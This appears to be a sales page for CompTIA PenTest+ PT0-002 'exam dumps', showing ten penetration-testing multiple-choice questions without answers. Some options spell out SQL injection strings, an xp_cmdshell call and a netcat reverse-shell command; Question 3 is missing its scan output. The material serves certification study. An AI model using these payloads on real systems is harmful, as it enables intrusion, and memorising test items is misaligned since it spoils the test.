Pre-Winter Special Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 2493360325

Good News !!! PT0-002 CompTIA PenTest+ Certification Exam is now Stable and With Pass Result

PT0-002 Practice Exam Questions and Answers

CompTIA PenTest+ Certification Exam

Last Update 12 hours ago
Total Questions : 433

CompTIA PenTest+ Certification Exam is stable now with all latest exam questions are added 12 hours ago. Incorporating PT0-002 practice exam questions into your study plan is more than just a preparation strategy.

PT0-002 exam questions often include scenarios and problem-solving exercises that mirror real-world challenges. Working through PT0-002 dumps allows you to practice pacing yourself, ensuring that you can complete all CompTIA PenTest+ Certification Exam practice test within the allotted time frame.

PT0-002 PDF

PT0-002 PDF (Printable)
$48
$119.99

PT0-002 Testing Engine

PT0-002 PDF (Printable)
$56
$139.99

PT0-002 PDF + Testing Engine

PT0-002 PDF (Printable)
$70.8
$176.99
Question # 1

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

Options:

A.  

Password brute force attack

B.  

SQL injection

C.  

Password spraying

D.  

Kerberoasting

Discussion 0
Question # 2

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x’ OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

Options:

A.  

Multifactor authentication

B.  

Encrypted communications

C.  

Secure software development life cycle

D.  

Parameterized queries

Discussion 0
Question # 3

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

Question # 3

The tester then runs the following command from the previous exploited system, which fails:

Which of the following explains the reason why the command failed?

Options:

A.  

The tester input the incorrect IP address.

B.  

The command requires the ג-port 135 option.

C.  

An account for RDP does not exist on the server.

D.  

PowerShell requires administrative privilege.

Discussion 0
Question # 4

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

Options:

A.  

MSA

B.  

NDA

C.  

SOW

D.  

ROE

Discussion 0
Question # 5

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

Options:

A.  

Dictionary

B.  

Directory

C.  

Symlink

D.  

Catalog

E.  

For-loop

Discussion 0
Question # 6

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

Options:

A.  

Alert the target company of the discovered information.

B.  

Verify the discovered information is correct with the manufacturer.

C.  

Scan the equipment and verify the findings.

D.  

Return to the dumpster for more information.

Discussion 0
Question # 7

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

Options:

A.  

The company that requested the penetration test

B.  

The penetration testing company

C.  

The target host's owner

D.  

The penetration tester

E.  

The subcontractor supporting the test

Discussion 0
Question # 8

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

Options:

A.  

Gain access to the target host and implant malware specially crafted for this purpose.

B.  

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.  

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.  

Proxy HTTP connections from the target host to that of the spoofed host.

Discussion 0
Question # 9

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

Options:

A.  

Nmap -s 445 -Pn -T5 172.21.0.0/16

B.  

Nmap -p 445 -n -T4 -open 172.21.0.0/16

C.  

Nmap -sV --script=smb* 172.21.0.0/16

D.  

Nmap -p 445 -max -sT 172. 21.0.0/16

Discussion 0
Question # 10

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY '00:00:05'

Which of the following should the penetration tester attempt NEXT?

Options:

A.  

http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'

B.  

http://company.com/catalog.asp?productid=22 ' OR 1=1 --

C.  

http://company.com/catalog.asp?productid=22 ' UNION SELECT 1,2,3 --

D.  

http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Discussion 0
Get PT0-002 dumps and pass your exam in 24 hours!

Free Exams Sample Questions